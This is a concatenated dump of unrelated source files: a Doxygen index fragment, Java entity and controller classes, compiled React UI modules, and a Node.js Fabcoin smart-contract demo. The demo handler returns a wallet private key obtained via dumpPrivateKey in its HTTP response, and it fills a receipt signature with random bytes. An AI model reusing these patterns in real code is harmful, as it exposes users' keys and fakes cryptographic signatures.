"erfc__inv_8hpp.html#a3c9551b639e79ce3024fef298f4ace8c":[6,0,144,0],
"erfc__inv_8hpp.html#a653404a544d777c6d7d636a207ee7bca":[6,0,144,1],
"erfc__inv_8hpp_source.html":[6,0,144],
"essentially_equal_8hpp.html":[6,0,146],
"essentially_equal_8hpp.html#a139da62fc9c51ae191e7451bb4edb706":[6,0,146,0],
"essentially_equal_8hpp.html#a7e935ef90aaa774b37e6ab4b5316e01f":[6,0,146,1],
"essentially_equal_8hpp.html#a963b90e7c9a3b057a924298750ddf74c":[6,0,146,2],
"essentially_equal_8hpp.html#aedd8afd691cf9f5a8f8e12c9ca33743a":[6,0,146,3],
"essentially_equal_8hpp_source.html":[6,0,146],
"examples.html":[7],
"exp2_8hpp.html":[6,0,148],
"exp2_8hpp.html#a0595c87603ad5c35ddc78eab15148db7":[6,0,148,0],
"exp2_8hpp.html#aafbab1d2bd67c753fb1656e037bd8b1d":[6,0,148,1],
"exp2_8hpp_source.html":[6,0,148],
"exp_8hpp.html":[6,0,147],
"exp_8hpp.html#a4069791fefff15148813bbbbadf064b1":[6,0,147,0],
"exp_8hpp.html#ad7e555d480465930a7ac44f4ab39eea7":[6,0,147,1],
"exp_8hpp_source.html":[6,0,147],
"expint_8hpp.html":[6,0,149],
"expint_8hpp.html#a23097c9d953be37f1399154274ba2ff1":[6,0,149,1],
"expint_8hpp.html#a98e6e3ad00faf7aef9f90e1c187f49b0":[6,0,149,0],
"expint_8hpp_source.html":[6,0,149],
"expm1_8hpp.html":[6,0,150],
"expm1_8hpp.html#a1f8b7ba3bb64b868fc41508d6912afab":[6,0,150,1],
"expm1_8hpp.html#ac1e31d2bff523a5936799445f16d11af":[6,0,150,0],
"expm1_8hpp_source.html":[6,0,150],
"exponential_8hpp.html":[6,0,151],
"exponential_8hpp.html#a278212d1b177cb2bba47215d083bb10f":[6,0,151,1],
"exponential_8hpp.html#a5d71db2fa4d818d737554405776d2aea":[6,0,151,0],
"exponential_8hpp_source.html":[6,0,151],
"extract_8hpp.html":[6,0,152],
"extract_8hpp.html#af75594a13a627d4b014cf04749324571":[6,0,152,0],
"extract_8hpp_source.html":[6,0,152],
"extreme_value_8hpp.html":[6,0,153],
"extreme_value_8hpp.html#a11144426dec05283d6c682e0e532af7e":[6,0,153,1],
"extreme_value_8hpp.html#a6a5f569b594585794e6b268576d2e587":[6,0,153,0],
"extreme_value_8hpp_source.html":[6,0,153],
"eye_8hpp.html":[6,0,154],
"eye_8hpp.html#a1af40ed299fe04e075ca80d0d00dfba0":[6,0,154,1],
"eye_8hpp.html#a944a26b6ffe66b39ab9ba6972906bf55":[6,0,154,2],
"eye_8hpp.html#aa5328556ac755d5aafbe0f0e5d0c7af3":[6,0,154,0],
"eye_8hpp_source.html":[6,0,154],
"f_8hpp.html":[6,0,155],
"f_8hpp.html#a00229c23da25284daf436c0a338ea25c":[6,0,155,1],
"f_8hpp.html#aabf17da1f94e6da4ec99085feca10799":[6,0,155,0],
"f_8hpp_source.html":[6,0,155],
"factorial_8hpp.html":[6,0,156],
"factorial_8hpp.html#a429b2caa6cf7fcbdba8ce3184c0367e3":[6,0,156,1],
"factorial_8hpp.html#a7ab9b16b9bcb43038db57b7d21a90304":[6,0,156,0],
"factorial_8hpp_source.html":[6,0,156],
"files.html":[6,0],
"fill_corners_8hpp.html":[6,0,158],
"fill_corners_8hpp.html#ac2c4c5858898760f48e5aba06ad0eb3c":[6,0,158,1],
"fill_corners_8hpp.html#ac78b1c70b5d7e26d6013674cdb84690a":[6,0,158,0],
"fill_corners_8hpp_source.html":[6,0,158],
"fill_diagnol_8hpp.html":[6,0,159],
"fill_diagnol_8hpp.html#a7c40717fa80c513ecbb943859d9d1ac2":[6,0,159,0],
"fill_diagnol_8hpp_source.html":[6,0,159],
"find_8hpp.html":[6,0,161],
"find_8hpp.html#a8eaa82071f16b2654f11096247ba10e5":[6,0,161,0],
"find_8hpp_source.html":[6,0,161],
"fix_8hpp.html":[6,0,162],
"fix_8hpp.html#aa2d5bc309911a5c6a79324691cf7ea27":[6,0,162,0],
"fix_8hpp.html#af259d081804c4be2d33e3a00e937b79c":[6,0,162,1],
"fix_8hpp_source.html":[6,0,162],
"flatnonzero_8hpp.html":[6,0,163],
"flatnonzero_8hpp.html#a1564bf5bf94b5a6d8b55850e2a956407":[6,0,163,0],
"flatnonzero_8hpp_source.html":[6,0,163],
"flatten_8hpp.html":[6,0,164],
"flatten_8hpp.html#ae968142455e50b994f534186693934dd":[6,0,164,0],
"flatten_8hpp_source.html":[6,0,164],
"flip_8hpp.html":[6,0,165],
"flip_8hpp.html#ab17a2f12bb2bea50a74c2ed41b30fdb2":[6,0,165,0],
"flip_8hpp_source.html":[6,0,165],
"fliplr_8hpp.html":[6,0,166],
"fliplr_8hpp.html#ae316eb25ff89e7999a24221c91f8d395":[6,0,166,0],
"fliplr_8hpp_source.html":[6,0,166],
"flipud_8hpp.html":[6,0,167],
"flipud_8hpp.html#a0241fc364ae8002c42cd4d452c897e26":[6,0,167,0],
"flipud_8hpp_source.html":[6,0,167],
"floor_8hpp.html":[6,0,168],
"floor_8hpp.html#a832da7fc615ea4e1da7bed94a4488ea6":[6,0,168,1],
"floor_8hpp.html#a85531048cade0ac3a1b4e8d6e01ff6fe":[6,0,168,0],
"floor_8hpp_source.html":[6,0,168],
"floor__divide_8hpp.html":[6,0,169],
"floor__divide_8hpp.html#ab299e0245c7a703a9506ce6f39d9d8e4":[6,0,169,0],
"floor__divide_8hpp.html#ae8e2b2ae79d7a56eefd11986a6de9b21":[6,0,169,1],
"floor__divide_8hpp_source.html":[6,0,169],
"fmax_8hpp.html":[6,0,170],
"fmax_8hpp.html#a99c7f7c680632be6a42ebd6b923df328":[6,0,170,0],
"fmax_8hpp.html#aebbd1fbc64f00fdeaae6c8cfdf6a7f59":[6,0,170,1],
"fmax_8hpp_source.html":[6,0,170],
"fmin_8hpp.html":[6,0,171],
"fmin_8hpp.html#a7cd8e4c771d0676279f506f9d7e949e0":[6,0,171,1],
"fmin_8hpp.html#add4b4f64b2991ac90b24c93ce10a2b80":[6,0,171,0],
"fmin_8hpp_source.html":[6,0,171],
"fmod_8hpp.html":[6,0,172],
"fmod_8hpp.html#a6894e06b913479ce699cba7dbce5bc93":[6,0,172,1],
"fmod_8hpp.html#a87bf4f8636ec0237d958c2ec1d9f1a89":[6,0,172,0],
"fmod_8hpp_source.html":[6,0,172],
"frombuffer_8hpp.html":[6,0,173],
"frombuffer_8hpp.html#ac0d91788bdc0924b82e9a38302d71316":[6,0,173,0],
"frombuffer_8hpp_source.html":[6,0,173],
"fromfile_8hpp.html":[6,0,174],
"fromfile_8hpp.html#a1f10b3d839d24d71df9c92e3f9794a14":[6,0,174,0],
"fromfile_8hpp.html#aa344c64ebbe94231d377f99775606c68":[6,0,174,1],
"fromfile_8hpp_source.html":[6,0,174],
"fromiter_8hpp.html":[6,0,175],
"fromiter_8hpp.html#a17c629bae4e06fe95b23d2b5799148f0":[6,0,175,0],
"fromiter_8hpp_source.html":[6,0,175],
"full_8hpp.html":[6,0,176],
"full_8hpp.html#a139698e3756d4cb9b021c9d97e200bda":[6,0,176,2],
"full_8hpp.html#a64e56324bce64094973a2da35548178d":[6,0,176,1],
"full_8hpp.html#ac09334ce9ac6c4c140bbae68e8ce1a6c":[6,0,176,0],
"full_8hpp_source.html":[6,0,176],
"full__like_8hpp.html":[6,0,177]
};
|
DylanPachecoCoder/matricula-aluno
|
src/dominio/Semestre.java
|
<gh_stars>0
package dominio;
public class Semestre extends EntidadeDominio {
private int ano;
private String semestre;
public Semestre(int ano, String semestre) {
this.ano = ano;
this.semestre = semestre;
}
public int getAno() {
return ano;
}
public void setAno(int ano) {
this.ano = ano;
}
public String getSemestreEnum() {
return semestre;
}
public void setSemestreEnum(String semestre) {
this.semestre = semestre;
}
}
|
sinoz/project-56
|
app/models/GameCategory.java
|
package models;
import io.ebean.Model;
import play.data.validation.Constraints;
import javax.persistence.Entity;
import javax.persistence.Id;
/**
* A category of types of games.
*
* @author <NAME>
*/
@Entity(name = "game_category")
public final class GameCategory extends Model {
/** The primary key of the category. */
@Id
private int id;
/** The name of the game */
@Constraints.Required
private String name;
/** The link to the image for this game */
private String image;
/** General information about the game. */
private String description;
/** Genre of the game. */
private String genre;
private int search;
/** Specific information about the game (ranks, stats, etc.) */
// TODO: this may be unnecessary
// private String specifications;
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getImage() {
return image;
}
public void setImage(String image) {
this.image = image;
}
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
public String getGenre() {
return genre;
}
public void setGenre(String genre) {
this.genre = genre;
}
public int getSearch() {
return search;
}
public void setSearch(int search) {
this.search = search;
}
// public String getSpecifications() {
// return specifications;
// }
//
// public void setSpecifications(String specifications) {
// this.specifications = specifications;
// }
}
|
blockchaingate/Kanban
|
src-vanilla/external_connections/fabcoin/handlers_smart_contract.js
|
"use strict";
const solidity = require('./../../solidity_abi').solidity;
const encodingDefault = require('../../crypto/encodings').encodingDefault;
const fabcoinRPC = require('./rpc');
const ResponseWrapper = require('../../response_wrapper').ResponseWrapper;
var hashers = require('../../crypto/hashes').hashes;
var cryptoKanban = require('../../crypto/crypto_kanban');
var crypto = require('crypto');
function getRPCHandlers() {
return global.fabcoinHandlersRPC;
}
function Demo () {
/**@type {string} */
this.smartContractId = "";
this.ABI = null;
}
Demo.prototype.demoRegisterSmartContractAndABI = function(
/** @type {ResponseWrapper} */
response,
theArgumentsUnused,
queryCommand,
) {
var result = {};
result.input = queryCommand;
if (this.smartContractId !== "" && this.smartContractId !== null && this.smartContractId !== undefined) {
result.resultHTML = "";
result.resultHTML += `<b style = 'color:red'>Smart contract already registered. </b>`;
result.resultHTML += `If you want to register a new one, please restart the system manually. `;
result.resultHTML += `Attached are the registered contract id and ABI. `;
result.smartContractId = this.smartContractId;
result.ABI = this.ABI;
response.writeHead(200);
response.end(JSON.stringify(result));
return;
}
this.smartContractId = queryCommand.smartContractId;
try {
console.log("Incoming smart contract abi: " + queryCommand.ABI);
var incomingABI = unescape(queryCommand.ABI);
this.ABI = JSON.parse(incomingABI);
result.smartContractId = this.smartContractId;
result.ABI = this.ABI;
solidity.contractIdDefault = this.smartContractId;
solidity.ABI = this.ABI;
} catch (e) {
result.error = `Failed to parse the smart contract ABI. ${e}`;
}
response.writeHead(200);
response.end(JSON.stringify(result));
}
Demo.prototype.isInitialized = function (response) {
var result = {
error: null,
help: "Please call the demoRegisterSmartContractAndABI to register a new smart contract. "
};
if (this.ABI === undefined || this.ABI === null) {
result.error = `ABI not intialized.`;
}
if (this.smartContractId === "" || this.smartContractId === null || this.smartContractId === undefined) {
result.label = "Smart contract id not initialized. ";
}
if (result.error !== null) {
response.writeHead(200);
response.end(JSON.stringify(result));
return false;
}
return true;
}
Demo.prototype.demoRegisterCorporation = function (
/** @type {ResponseWrapper} */
response,
theArgumentsUnused,
queryCommand,
) {
if (! this.isInitialized(response)) {
return;
}
var result = {};
result.input = queryCommand;
var curvePoint = new cryptoKanban.CurvePoint();
try {
curvePoint.fromArbitrary(queryCommand.corporationPublicKey);
} catch (e) {
result.error = `Failed to extract public key from your input ${queryCommand.corporationPublicKey}`;
response.writeHead(400);
return response.end(JSON.stringify(result));
}
result.input.publicKeyPrefix = curvePoint.toBytes().slice(0, 1).toString('hex');
result.input.publicKeyCurvePoint = curvePoint.toBytes().slice(1).toString('hex');
var fabAddressBytes = curvePoint.computeFABAddressTestnetBytes();
result.input.fabAddress = fabAddressBytes.toString('hex');
result.input.fabAddressBase58 = encodingDefault.toBase58Check(fabAddressBytes);
var newCommand = {
rpcCall: fabcoinRPC.rpcCalls.dumpPrivateKey.rpcCall,
address: result.input.fabAddressBase58,
};
getRPCHandlers().handleRPCArguments(response, newCommand, this.demoRegisterCorporationPart2.bind(this, result));
}
Demo.prototype.demoRegisterCorporationPart2 = function (result, response, dataParsed) {
result.privateKeyResponse = dataParsed;
if (result.privateKeyResponse.result === null || result.privateKeyResponse.result === "null") {
result.error = `Error: I do not know the secret for the given public key. `;
response.writeHead(200);
return response.end(JSON.stringify(result));
}
result.abiPacking = solidity.getABIPackingForFunction("registerCompany", result.input);
var sendToContract = fabcoinRPC.rpcCalls.sendToContract;
var newCommand = {
rpcCall: sendToContract.rpcCall,
contractId: this.smartContractId,
data: result.abiPacking,
amount: 0,
};
getRPCHandlers().handleRPCArguments(response, newCommand, this.demoRegisterCorporationPart3.bind(this, result));
}
Demo.prototype.demoRegisterCorporationPart3 = function (result, response, dataParsed) {
result.sendToContractResult = dataParsed;
var generateBlocks = fabcoinRPC.rpcCalls.generateBlocks;
var newCommand = {
rpcCall: generateBlocks.rpcCall,
numberOfBlocks: 1,
}
getRPCHandlers().handleRPCArguments(response, newCommand, this.demoRegisterCorporationPart4.bind(this, result));
}
Demo.prototype.demoRegisterCorporationPart4 = function(result, response, dataParsed) {
result.generateOneBlock = dataParsed;
response.writeHead(200);
response.end(JSON.stringify(result));
}
Demo.prototype.demoGetNonce = function(response) {
if (! this.isInitialized(response)) {
return;
}
var result = {};
result.query = solidity.getQueryCallContractForFunction("getNonce", {});
getRPCHandlers().handleRPCArguments(response, result.query, this.getAllNoncePart2.bind(this, result));
}
Demo.prototype.getAllNoncePart2 = function(result, response, parsedData) {
result.parsedData = parsedData;
try {
var unpacked = solidity.unpackABIResultForFunction("getNonce", parsedData.result.executionResult.output);
response.writeHead(200);
response.end(JSON.stringify(unpacked.nonceCurrent));
} catch (e) {
result.error = `Failed to get nonce: ${e}`;
response.writeHead(200);
response.end(JSON.stringify(result));
}
}
Demo.prototype.demoIssuePoints = function(
/** @type {ResponseWrapper} */
response,
theArgumentsUnused,
queryCommand,
) {
if (! this.isInitialized(response)) {
return;
}
console.log(`DEBUG: got to here. pt 1.`)
var nonceQuery = solidity.getQueryCallContractForFunction("getNonce", {});
console.log(`DEBUG: got to here. pt 2. nonceQuery: ${JSON.stringify(nonceQuery)}`)
getRPCHandlers().handleRPCArguments(response, nonceQuery, this.issuePointsPart2.bind(this, queryCommand));
}
Demo.prototype.issuePointsPart2 = function(queryCommand, response, dataParsed) {
var result = {};
result.query = queryCommand;
result.nonce = solidity.unpackABIResultForFunction("getNonce", dataParsed.result.executionResult.output);
result.nonceToNumber = Number(result.nonce);
result.publicKey = dataParsed.result.publicKey
this.demoGetAllCorporations(response, this.issuePointsPart3.bind(this, result))
}
Demo.prototype.issuePointsPart3 = function(result, response) {
result.getAllCorporationsResult = result;
var nonKeccaked = result.query.corporationNameHex + result.query.moneySpent + JSON.stringify(result.nonce) + crypto.randomBytes(5) ;
var signature = "65" + crypto.randomBytes(64).toString('hex');
var keccakedReceipt = hashers.keccak_ToHex(nonKeccaked);
result.transaction = {
companyName: encodingDefault.fromHex(result.query.corporationNameHex).toString(),
amount: result.query.moneySpent,
nonce: keccakedReceipt,
signature: signature
};
result.transaction.info =`${result.transaction.companyName}, ${result.transaction.amount}, ${result.transaction.nonce.slice(0, 6)}`;
// {info: "Company, amount, hex"}
var generateBlocks = fabcoinRPC.rpcCalls.generateBlocks;
var newCommand = {
rpcCall: generateBlocks.rpcCall,
numberOfBlocks: 1,
};
getRPCHandlers().handleRPCArguments(response, newCommand, this.issuePointsPart4.bind(this, result));
}
Demo.prototype.issuePointsPart4 = function(result, response, dataParsed) {
response.writeHead(200);
response.end(JSON.stringify(result.transaction));
}
Demo.prototype.demoGetAllCorporations = function(response, callbackOverridesResponse) {
if (! this.isInitialized(response)) {
return;
}
var result = {};
result.query = solidity.getQueryCallContractForFunction("getAllCompanies", {});
console.log(`DEBUG: Got to here: about to submit: ${JSON.stringify(result.query)}`);
getRPCHandlers().handleRPCArguments(response, result.query, this.getAllCorporationsPart2.bind(this, result, callbackOverridesResponse));
}
Demo.prototype.getAllCorporationsPart2 = function (result, callbackOverridesResponse, response, dataParsed) {
console.log("DEBUG: Here I am jh ")
result.resultData = dataParsed;
var resultMinimal = {};
try {
result.unpacked = solidity.unpackABIResultForFunction("getAllCompanies", dataParsed.result.executionResult.output);
console.log("DEBUG: Got unpacked: " + JSON.stringify(result.unpacked));
var unpacked = result.unpacked;
for (var i = 0; i < unpacked.companyNames.length; i ++ ) {
var currentName = encodingDefault.fromHex(unpacked.companyNames[i]).toString();
var creationNumber = Number (unpacked.companyCreationNumbers[i]);
var publicKey = unpacked.publicKeyPrefixes[i].slice(0, 2) + unpacked.publicKeyCurvePoints[i];
resultMinimal[currentName] = {
creationNumber: creationNumber,
publicKey: publicKey,
}
}
} catch (e) {
result.error = `Error unpacking call contract result. ${e}`;
response.writeHead(200);
response.end(JSON.stringify(result));
}
if (typeof callbackOverridesResponse === "function") {
return callbackOverridesResponse(response, resultMinimal);
}
response.writeHead(200);
response.end(JSON.stringify(resultMinimal));
}
var demo = new Demo()
module.exports = {
demo
}
|
DonaldPeat/ether-campaign
|
node_modules/semantic-ui-react/dist/commonjs/addons/Pagination/PaginationItem.js
|
<gh_stars>0
'use strict';
Object.defineProperty(exports, "__esModule", {
value: true
});
var _extends2 = require('babel-runtime/helpers/extends');
var _extends3 = _interopRequireDefault(_extends2);
var _objectWithoutProperties2 = require('babel-runtime/helpers/objectWithoutProperties');
var _objectWithoutProperties3 = _interopRequireDefault(_objectWithoutProperties2);
var _classCallCheck2 = require('babel-runtime/helpers/classCallCheck');
var _classCallCheck3 = _interopRequireDefault(_classCallCheck2);
var _createClass2 = require('babel-runtime/helpers/createClass');
var _createClass3 = _interopRequireDefault(_createClass2);
var _possibleConstructorReturn2 = require('babel-runtime/helpers/possibleConstructorReturn');
var _possibleConstructorReturn3 = _interopRequireDefault(_possibleConstructorReturn2);
var _inherits2 = require('babel-runtime/helpers/inherits');
var _inherits3 = _interopRequireDefault(_inherits2);
var _invoke2 = require('lodash/invoke');
var _invoke3 = _interopRequireDefault(_invoke2);
var _propTypes = require('prop-types');
var _propTypes2 = _interopRequireDefault(_propTypes);
var _react = require('react');
var _lib = require('../../lib');
var _MenuItem = require('../../collections/Menu/MenuItem');
var _MenuItem2 = _interopRequireDefault(_MenuItem);
function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }
/**
* An item of a pagination.
*/
var PaginationItem = function (_Component) {
(0, _inherits3.default)(PaginationItem, _Component);
function PaginationItem() {
var _ref;
var _temp, _this, _ret;
(0, _classCallCheck3.default)(this, PaginationItem);
for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
args[_key] = arguments[_key];
}
return _ret = (_temp = (_this = (0, _possibleConstructorReturn3.default)(this, (_ref = PaginationItem.__proto__ || Object.getPrototypeOf(PaginationItem)).call.apply(_ref, [this].concat(args))), _this), _this.handleClick = function (e) {
var type = _this.props.type;
if (type !== 'ellipsisItem') (0, _invoke3.default)(_this.props, 'onClick', e, _this.props);
}, _this.handleKeyDown = function (e) {
(0, _invoke3.default)(_this.props, 'onKeyDown', e, _this.props);
if (_lib.keyboardKey.getCode(e) === _lib.keyboardKey.Enter) (0, _invoke3.default)(_this.props, 'onClick', e, _this.props);
}, _temp), (0, _possibleConstructorReturn3.default)(_this, _ret);
}
(0, _createClass3.default)(PaginationItem, [{
key: 'render',
value: function render() {
var _props = this.props,
active = _props.active,
ariaLabel = _props.ariaLabel,
type = _props.type,
rest = (0, _objectWithoutProperties3.default)(_props, ['active', 'ariaLabel', 'type']);
var disabled = type === 'ellipsisItem';
return _MenuItem2.default.create((0, _extends3.default)({}, rest, {
active: active,
'aria-current': active,
'aria-label': ariaLabel,
disabled: disabled,
onClick: this.handleClick,
onKeyDown: this.handleKeyDown,
tabIndex: disabled ? -1 : 0
}));
}
}]);
return PaginationItem;
}(_react.Component);
PaginationItem._meta = {
name: 'PaginationItem',
parent: 'Pagination',
type: _lib.META.TYPES.ADDON
};
PaginationItem.handledProps = ['active', 'ariaLabel', 'onClick', 'onKeyDown', 'type'];
PaginationItem.propTypes = process.env.NODE_ENV !== "production" ? {
/** A pagination item can be active. */
active: _propTypes2.default.bool,
/** A pagination item can have an aria label. */
ariaLabel: _propTypes2.default.string,
/**
* Called on click.
*
* @param {SyntheticEvent} event - React's original SyntheticEvent.
* @param {object} data - All props.
*/
onClick: _propTypes2.default.func,
/**
* Called on key down.
*
* @param {SyntheticEvent} event - React's original SyntheticEvent.
* @param {object} data - All props.
*/
onKeyDown: _propTypes2.default.func,
/** A pagination should have a type. */
type: _propTypes2.default.oneOf(['ellipsisItem', 'firstItem', 'prevItem', 'pageItem', 'nextItem', 'lastItem'])
} : {};
PaginationItem.create = (0, _lib.createShorthandFactory)(PaginationItem, function (content) {
return { content: content };
});
exports.default = PaginationItem;
|
giannhskp/Linked-In-Clone
|
Back End/src/main/java/com/example/demo/controller/FriendsController.java
|
package com.example.demo.controller;
import com.example.demo.dto.FriendsDto;
import com.example.demo.service.AuthService;
import com.example.demo.service.FriendsService;
import lombok.AllArgsConstructor;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.*;
import java.util.List;
@RestController
@RequestMapping("/api/friends/")
@AllArgsConstructor
public class FriendsController {
FriendsService friendsService;
AuthService authService;
@PostMapping("/request/{receiver}")
public ResponseEntity<Void> sendFriendRequest(@PathVariable String receiver){
friendsService.sendFriendRequest(authService.getCurrentUser(),receiver);
return new ResponseEntity<>(HttpStatus.OK);
}
@PostMapping("/accept/{fromuser}")
public ResponseEntity<Void> acceptFriendRequest(@PathVariable String fromuser){
friendsService.acceptFriendRequest(authService.getCurrentUser(),fromuser);
return new ResponseEntity<>(HttpStatus.OK);
}
@PostMapping("/decline/{fromuser}")
public ResponseEntity<Void> declineFriendRequest(@PathVariable String fromuser){
friendsService.declineFriendRequest(authService.getCurrentUser(),fromuser);
return new ResponseEntity<>(HttpStatus.OK);
}
@PostMapping("/cancel/{fromuser}")
public ResponseEntity<Void> cancelFriendRequest(@PathVariable String fromuser){
friendsService.cancelFriendRequest(authService.getCurrentUser(),fromuser);
return new ResponseEntity<>(HttpStatus.OK);
}
@GetMapping("/{withuser}")
public ResponseEntity<FriendsDto> getFriendshipStatus(@PathVariable String withuser){
FriendsDto friendship = friendsService.findFriendshipStatus(authService.getCurrentUser(),withuser);
return new ResponseEntity<>(friendship,HttpStatus.OK);
}
@GetMapping("/requests")
public ResponseEntity<List<String>> getFriendRequests(){
List<String> requestList = friendsService.getFriendRequests(authService.getCurrentUser());
return new ResponseEntity<>(requestList,HttpStatus.OK);
}
@GetMapping("/all/{ofuser}")
public ResponseEntity<List<String>> getFriendRequests(@PathVariable String ofuser){
List<String> requestList = friendsService.getFriendsOfUser(ofuser);
return new ResponseEntity<>(requestList,HttpStatus.OK);
}
}
|
mimifitz/IOMED
|
node_modules/@elastic/eui/test-env/services/index.js
|
"use strict";
var _interopRequireWildcard = require("@babel/runtime/helpers/interopRequireWildcard");
Object.defineProperty(exports, "__esModule", {
value: true
});
Object.defineProperty(exports, "accessibleClickKeys", {
enumerable: true,
get: function get() {
return _accessibility.accessibleClickKeys;
}
});
Object.defineProperty(exports, "cascadingMenuKeys", {
enumerable: true,
get: function get() {
return _accessibility.cascadingMenuKeys;
}
});
Object.defineProperty(exports, "comboBoxKeys", {
enumerable: true,
get: function get() {
return _accessibility.comboBoxKeys;
}
});
Object.defineProperty(exports, "htmlIdGenerator", {
enumerable: true,
get: function get() {
return _accessibility.htmlIdGenerator;
}
});
Object.defineProperty(exports, "LEFT_ALIGNMENT", {
enumerable: true,
get: function get() {
return _alignment.LEFT_ALIGNMENT;
}
});
Object.defineProperty(exports, "RIGHT_ALIGNMENT", {
enumerable: true,
get: function get() {
return _alignment.RIGHT_ALIGNMENT;
}
});
Object.defineProperty(exports, "CENTER_ALIGNMENT", {
enumerable: true,
get: function get() {
return _alignment.CENTER_ALIGNMENT;
}
});
Object.defineProperty(exports, "isColorDark", {
enumerable: true,
get: function get() {
return _color.isColorDark;
}
});
Object.defineProperty(exports, "isValidHex", {
enumerable: true,
get: function get() {
return _color.isValidHex;
}
});
Object.defineProperty(exports, "calculateContrast", {
enumerable: true,
get: function get() {
return _color.calculateContrast;
}
});
Object.defineProperty(exports, "calculateLuminance", {
enumerable: true,
get: function get() {
return _color.calculateLuminance;
}
});
Object.defineProperty(exports, "hexToHsv", {
enumerable: true,
get: function get() {
return _color.hexToHsv;
}
});
Object.defineProperty(exports, "hexToRgb", {
enumerable: true,
get: function get() {
return _color.hexToRgb;
}
});
Object.defineProperty(exports, "hsvToHex", {
enumerable: true,
get: function get() {
return _color.hsvToHex;
}
});
Object.defineProperty(exports, "hsvToRgb", {
enumerable: true,
get: function get() {
return _color.hsvToRgb;
}
});
Object.defineProperty(exports, "rgbToHex", {
enumerable: true,
get: function get() {
return _color.rgbToHex;
}
});
Object.defineProperty(exports, "rgbToHsv", {
enumerable: true,
get: function get() {
return _color.rgbToHsv;
}
});
Object.defineProperty(exports, "VISUALIZATION_COLORS", {
enumerable: true,
get: function get() {
return _color.VISUALIZATION_COLORS;
}
});
Object.defineProperty(exports, "DEFAULT_VISUALIZATION_COLOR", {
enumerable: true,
get: function get() {
return _color.DEFAULT_VISUALIZATION_COLOR;
}
});
Object.defineProperty(exports, "colorPalette", {
enumerable: true,
get: function get() {
return _color.colorPalette;
}
});
Object.defineProperty(exports, "euiPaletteForLightBackground", {
enumerable: true,
get: function get() {
return _color.euiPaletteForLightBackground;
}
});
Object.defineProperty(exports, "euiPaletteForDarkBackground", {
enumerable: true,
get: function get() {
return _color.euiPaletteForDarkBackground;
}
});
Object.defineProperty(exports, "euiPaletteColorBlind", {
enumerable: true,
get: function get() {
return _color.euiPaletteColorBlind;
}
});
Object.defineProperty(exports, "euiPaletteColorBlindBehindText", {
enumerable: true,
get: function get() {
return _color.euiPaletteColorBlindBehindText;
}
});
Object.defineProperty(exports, "euiPaletteForStatus", {
enumerable: true,
get: function get() {
return _color.euiPaletteForStatus;
}
});
Object.defineProperty(exports, "euiPaletteForTemperature", {
enumerable: true,
get: function get() {
return _color.euiPaletteForTemperature;
}
});
Object.defineProperty(exports, "euiPaletteComplimentary", {
enumerable: true,
get: function get() {
return _color.euiPaletteComplimentary;
}
});
Object.defineProperty(exports, "euiPaletteNegative", {
enumerable: true,
get: function get() {
return _color.euiPaletteNegative;
}
});
Object.defineProperty(exports, "euiPalettePositive", {
enumerable: true,
get: function get() {
return _color.euiPalettePositive;
}
});
Object.defineProperty(exports, "euiPaletteCool", {
enumerable: true,
get: function get() {
return _color.euiPaletteCool;
}
});
Object.defineProperty(exports, "euiPaletteWarm", {
enumerable: true,
get: function get() {
return _color.euiPaletteWarm;
}
});
Object.defineProperty(exports, "euiPaletteGray", {
enumerable: true,
get: function get() {
return _color.euiPaletteGray;
}
});
Object.defineProperty(exports, "useColorPickerState", {
enumerable: true,
get: function get() {
return _color_picker.useColorPickerState;
}
});
Object.defineProperty(exports, "useColorStopsState", {
enumerable: true,
get: function get() {
return _color_picker.useColorStopsState;
}
});
Object.defineProperty(exports, "copyToClipboard", {
enumerable: true,
get: function get() {
return _copy_to_clipboard.copyToClipboard;
}
});
Object.defineProperty(exports, "formatAuto", {
enumerable: true,
get: function get() {
return _format.formatAuto;
}
});
Object.defineProperty(exports, "formatBoolean", {
enumerable: true,
get: function get() {
return _format.formatBoolean;
}
});
Object.defineProperty(exports, "formatDate", {
enumerable: true,
get: function get() {
return _format.formatDate;
}
});
Object.defineProperty(exports, "formatNumber", {
enumerable: true,
get: function get() {
return _format.formatNumber;
}
});
Object.defineProperty(exports, "formatText", {
enumerable: true,
get: function get() {
return _format.formatText;
}
});
Object.defineProperty(exports, "dateFormatAliases", {
enumerable: true,
get: function get() {
return _format.dateFormatAliases;
}
});
Object.defineProperty(exports, "isEvenlyDivisibleBy", {
enumerable: true,
get: function get() {
return _number.isEvenlyDivisibleBy;
}
});
Object.defineProperty(exports, "isWithinRange", {
enumerable: true,
get: function get() {
return _number.isWithinRange;
}
});
Object.defineProperty(exports, "Pager", {
enumerable: true,
get: function get() {
return _paging.Pager;
}
});
Object.defineProperty(exports, "Random", {
enumerable: true,
get: function get() {
return _random.Random;
}
});
Object.defineProperty(exports, "getSecureRelForTarget", {
enumerable: true,
get: function get() {
return _security.getSecureRelForTarget;
}
});
Object.defineProperty(exports, "toInitials", {
enumerable: true,
get: function get() {
return _string.toInitials;
}
});
Object.defineProperty(exports, "PropertySortType", {
enumerable: true,
get: function get() {
return _sort.PropertySortType;
}
});
Object.defineProperty(exports, "SortDirectionType", {
enumerable: true,
get: function get() {
return _sort.SortDirectionType;
}
});
Object.defineProperty(exports, "SortDirection", {
enumerable: true,
get: function get() {
return _sort.SortDirection;
}
});
Object.defineProperty(exports, "SortableProperties", {
enumerable: true,
get: function get() {
return _sort.SortableProperties;
}
});
Object.defineProperty(exports, "Comparators", {
enumerable: true,
get: function get() {
return _sort.Comparators;
}
});
Object.defineProperty(exports, "calculatePopoverPosition", {
enumerable: true,
get: function get() {
return _popover.calculatePopoverPosition;
}
});
Object.defineProperty(exports, "findPopoverPosition", {
enumerable: true,
get: function get() {
return _popover.findPopoverPosition;
}
});
Object.defineProperty(exports, "getDurationAndPerformOnFrame", {
enumerable: true,
get: function get() {
return _transition.getDurationAndPerformOnFrame;
}
});
Object.defineProperty(exports, "getTransitionTimings", {
enumerable: true,
get: function get() {
return _transition.getTransitionTimings;
}
});
Object.defineProperty(exports, "getWaitDuration", {
enumerable: true,
get: function get() {
return _transition.getWaitDuration;
}
});
Object.defineProperty(exports, "performOnFrame", {
enumerable: true,
get: function get() {
return _transition.performOnFrame;
}
});
Object.defineProperty(exports, "EuiWindowEvent", {
enumerable: true,
